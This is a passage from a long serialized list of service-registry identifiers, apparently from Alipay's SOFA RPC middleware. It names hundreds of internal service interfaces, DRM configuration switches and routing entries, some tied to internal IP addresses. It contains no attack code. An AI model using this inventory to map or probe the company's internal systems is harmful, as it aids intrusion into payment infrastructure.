ORM_EVENT2#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.178.33#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:omocore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.buc.acl.api.service.UserPermissionsService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.RecoverService:1.0:supergw.t138.alipay.net@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchantsettle.service.common.facade.SettleAccountQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.196.212#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitysimulate.common.service.facade.service.CheckPointQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.logAmountCoverageRuleExclude,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:publichome@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataassets.common.service.facade.CommonQueryModel:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.genericmerchant.facade.BizUnitQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.247.45#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.afsc.common.service.huntshadow.HsAlertInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.adbasiclib.ad.rpc.AdService:1.0:adexchange-alipaypointcust@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.esp.endpoint.hbase.HbaseRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.framodel.core.service.facade.api.FramodelIndexFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.common.service.integration.cif.UserInfoQueryServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.integration.oss.OSSStore:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbbusinessprod.common.service.facade.background.MerchantAccountBindBgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bluearmyprod:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_S_AUTHORIZY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.iaccenter.facade.manage.api.ClearingChannelApiManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.zcache.switcher.zprodqueryTairCacheCZone.switcherValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilesync.common.service.spi.api.MobileSyncUpstreamSpiService:1.0:adatabus.default@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.normalapp:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_RQ_Notify_2#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.insautobff:name=com.alipay.chair.businessgray.drm.renderGray.renderGrayAccountLevel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lifemng.facade.ebppprod.EbppMobileSegmentFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.admin.AppVersionQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.faudioingest.common.service.facade.xnncloud.XnnCloudV2ToolServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:antia@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmembermng.common.service.facade.inviteconfig.service.InviteConfigUIService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.254.90#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zdataservice.common.service.facade.BizOrderRefundQueryService:1.0:zdataquery@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custcenter.service.facade.migration.MigrationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBack:1.0:finbatch@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.0.118#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mrchselfop_auditFinishCallbackSupport@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.limitcenter.service.facade.limitcheck.api.LimitCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Pub_Servers_TP_K_CIFPROCESS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.paycore.service.payment.xtrans.AssetFinalizeService:1.0:fincapacity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zmng.facade.reference.RemoteCompareService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.PcardBindInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iliquidity.biz.manager.swap.SwapMaintManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.bizide.common.service.facade.api.BizFunctionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcalbmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qualitymeasure.service.facade.api.CampaignService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.77.24#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.icontrol.common.service.facade.IvrAppointServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.tradetemplate.TradeTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.signExpireInterval,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.acdoccore.common.service.facade.site.SiteSyncTaskManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dms.common.service.DmsExperimentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpublish.common.service.facade.CallbackServiceFacade:1.0:devcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.datafactory.DataFactoryTaskTrFacade:1.0:indirectMerchantSyncShopHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditprerec.service.FeiSqlGenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitycap:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.storeValidateDetail,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileappcommon.common.service.facade.businessresource.BusinessResourceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csbizcenter.facade.admin.polymer.CategoryAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.core.service.drm.FinVoucherControlResource.finCommonCouponMinAlertThresholdRatio,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.income.common.service.facade.BillFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoscene.common.service.facade.api.united.FinsUnitedContractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:ifeaturemngus@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gotonemng.service.integration.sfs.SFSFileProcessorClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_DATABUS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.fingiftprodTairCache.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openeval.core.service.emulator.common.logsim.reqlogreadonlymarker.OeEmulatorReqLogReadOnlyMarkerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataSourceCalcService:1.0:publicDomain_finannafccore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininsightmng.common.service.facade.feature.api.FeatureMetaInfoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.45.226#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openitemcore.common.service.facade.api.item.ItemSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.antfeature.manager.AntFeatureVelocityEventStoreManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfpayrcv.facade.api.PaymentEngineAcceptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.biz.rest.DialogManagerRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.findefencecore.common.service.wmonitor.facade.WorkOrderMonitorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.common.service.integration.drm.VoucherConfigResource.assetAppendDetails,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcloanapply.common.service.facade.service.admission.AdmissionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scenecube.facade.SchemaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.adcfaultcore.facade.awatch.AwatchDrillFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.45.148#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promokernel.common.service.facade.api.RelationRecordOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.promotion.common.service.facade.api.rule.RuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.xb.XbPortfolioFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.OfflinepayCardSceneFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.SocialProfileCzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revol.core.service.facade.ScriptChecker:1.0:cone_script_test_sim@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.spi.service.MobilePEPService:1.0:inslifeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandQueueSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dataphin.dpchangeguardian.common.facade.strategy.StrategyApi:1.0:dpchangeguardian@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.common.service.facade.DiscountRecordQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@trafficlimitcenter#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.fc.operator.common.service.facade.OperatorClassificationQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata.dwm.client.table.MountTableScheduleOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:dattack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.iconnect.common.facade.api.CreativeManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbstaffcenter.common.service.facade.processor.StaffBasicSalaryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_REGISTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.securitydata:name=com.alipay.securitydata.biz.service.impl.drm.AntqMsgMngResource.consumerRunModeVariable0,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.42.14#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zpaas:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.sqlParamCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.anteduprod.common.service.facade.api.certify.EduCampusCardExamineQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianprod.zhx.facade.ZHXClaimFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ccr.facade.RefundBillQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mrchselfop_artisan_antProcessCallback_finished@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianprod.common.service.facade.AccountSecurityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:spcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.admin.SmallNoteManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.zcbmarketcenter.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antassistant.biz.rest.GeneralRecommendServiceGatewayRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:csassistant@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bkpromofront.facade.group.CampaignService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oceanbase.obforumcore.service.user.message.UserMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_CAP#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInRouteValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.miniprod.common.service.facade.api.miniappkeep.MiniAppKeepPrizeTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findatacanal.common.service.api.QuotationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.sqlCommonRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:apires_email_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.quality.TopicFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngTairCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcinstecoprod.common.service.facade.UnionCardInstQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.golden.common.facade.charge.ServiceUsingFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.CompoundInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.common.service.facade.channel.config.InstChannelApiQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsupport:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:test-core@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.73.156.201#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.koubei.kbcscenter.facade.GenericQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:meshysop@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.graymng.common.service.facade.api.GrayPublishFacade:1.0:graymng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.15.240.131#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:scilab@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.giftprod.amy.service.facade.GiftReceiverServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.test.fault.tolerance.bean.HelloService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.biz.alipayauth.service.BaseAlipayAuthService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.common.service.facade.api.query.CfpBizVoucherQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recon.common.service.query.fund.api.QueryInstItemService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.biz.platform.apipackage.PackageAuditManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.echo.platform.client.drm.EchoPlaybackConfigDrm.playbackStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zappinfo:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.common.auth.infrastructure.facade.AuthenticationClientFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:sofabootRPCdemo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.revcore.biz.shared.drm.DrmData.ignoreCommissionOnlineAccountMsg,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insxhbprod.apportion.service.UserApportionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.globalfacade.GlobalSyncDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PUBLICHOME#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkinstportal.common.service.facade.deptchannel.api.InstptDeptChRelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:i-griver-h5@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.174.177#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcactivitycore.facade.usercode.PcreditActivityCoreUserCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.keymap.facade.asset.api.SensRecognizeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataViewProtocolQueryService:1.0:sesameCredit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.goldetf.api.GoldtransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","lifecore@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.fininfo:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.logLevelMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.opm.biz.migration.facade.MigrationEntryPointFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.facade.servicedispense.UndertakeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivemng.common.service.facade.api.schedule.sofa4.ScheduleQuerySofa4Service:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.common.astconfig.api.AstconfigQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:fundprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.rate.triple.RateImpressionTriple:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.processmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.166.227.65#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promocenter.facade.api.recruit.partner.RecruitPartnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketcore.kernel.common.service.facade.ProductFacade:1.0:kProductFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.linka:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.ssrfPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mapitool.facade.api.ApiManageFacade:1.0:mapitool@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.manager.facade.api.EinvInvoiceApplyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetpreference.api.facade.hotopinion.HotOpinionRouteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quotstore.api.QuoteQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.xview.core.common.facade.CallbackService:1.0:iprofile@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alphasecmng.common.service.facade.DemoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.SchedulePointFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.service.enterprise.api.EPSecurityprodManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.pointprod.common.util.resource.PointCapacityDrmResouce.selfOperateWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.airbops:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInMatchAllRequest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_ZIMTMSVCPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.fininfo.pcconfigwrite.validator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcardcore.common.service.facade.mpcard.MPcardReturnFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instopen.service.facade.message.GroupMessageOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.account.MessageOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditdmp.facade.PcdmpVerifyWhitelistManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pledgecore.common.service.facade.api.PledgeConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.opinioncore.emcooperateZdalDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.permlimit:name=com.alipay.permlimit.nearshare.drm.DowngradeSwitchConfig.degradeProdtransStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.superUserListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zplayback.playback.service.PivotalParamService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.biz.facade.api.FileMarkManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.antforest:name=com.alipay.antforest.core.drd.container.loaders.DrmConfigLoader.pushServiceConfigs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zcbmarketcenter:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nearbyshopbase.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxtrade.common.service.facade.cp.CounterPartyParamFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxprod.common.service.facade.api.attribute.AttributeRelationMngConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_LOAN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mshopprod.common.service.facade.white.list.WhiteListManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.prodcore_o2ob_GoldenDataSource.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.core.orderexec.core.drm.CoreOrderExecuteDRMResource.indexEstimateDegradeToValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitycap:name=com.alipay.zdal.ldc.tair.membercenterTairCache.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.103.157#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.antscheduler.facade.IStreamExecuteInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.finassetpreference.api.facade.AssetInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finscene.common.service.facade.api.StrategyQueryFacade:1.0:finscene-forward@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.biz.emotion.rpc.api.ChatBackgroundRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:iaassettrans@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.faasset.api.asset.FaAssetTransCancelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.eindustr